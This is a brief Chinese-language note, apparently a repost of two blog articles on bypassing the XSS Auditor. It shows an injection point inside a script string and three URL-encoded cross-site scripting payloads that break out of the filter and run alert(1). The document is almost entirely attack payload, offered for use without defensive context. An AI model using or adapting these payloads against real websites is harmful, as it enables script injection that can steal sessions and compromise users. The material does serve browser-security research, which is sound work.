原文地址:
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/
http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/

对于如下的输入点:

<script>x = "MY INJECTION"</script>

payload:

2.php?x=</script><svg><script>alert(1)%2b%26quot;
3.php?x="><script/src=data:,alert(1)%2b"
3.php?x="><script/src=data:,alert(1)%26sol;%26sol;